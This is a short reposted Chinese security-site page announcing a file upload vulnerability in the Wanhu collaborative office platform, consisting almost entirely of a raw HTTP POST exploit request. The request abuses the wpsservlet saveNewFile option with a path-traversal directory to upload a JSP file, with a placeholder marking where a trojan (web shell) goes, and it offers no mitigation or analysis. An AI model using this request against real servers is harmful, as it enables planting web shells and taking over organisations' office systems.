万户协同办公平台接口存在文件上传漏洞

2023年9月4日09:06:25评论190 views字数 488阅读1分37秒阅读模式

POST

/defaultroot/wpsservlet?option=saveNewFile&newdocld=jsp&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1Host:xxx.xxx.xxx.xxxUser-Agent:Content-Length:266Cache-Control:max-age=0Content-Type:multipart/form-data;boundary=803e058d60f347f7b3c17fa95228eca6Accept-Encoding: gzip,deflateConnection:close--221e166d60f34112b3c17fa95818ecfeContent-Disposition:form-data;name="NewFile";filename="jsp.jsp"<% jsp 上传的木马地址 %>--221e166d60f34112b3c17fa95818ecfe--

原文始发于微信公众号（小明今天拿站了吗）：万户协同办公平台接口存在文件上传漏洞

左青龙
微信扫一扫

右白虎
微信扫一扫

本文由 admin 发表于 2023年9月4日09:06:25
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
万户协同办公平台接口存在文件上传漏洞https://cn-sec.com/archives/2004466.html

在线咨询

13688888888

8888 QQ在线咨询

微信
本页二维码

万户协同办公平台接口存在文件上传漏洞

HackTheBox系列/简单难度之Certberus（Icinga与ManageEngine的漏洞利用、端口转发）

一次高难度红队行动「下」

一次高难度红队行动「上」

若依刷洞技巧分享

绕过Facebook CSRF防护机制实现账户劫持

PHP反序列化靶场通关训练

任意文件上传的曲折到等待上线

CSRF漏洞：攻击原理、检测方法和防范措施

谷歌实践：大模型中如何避免性别偏见？

某高校从互联网到内网

发表评论

在线咨询

微信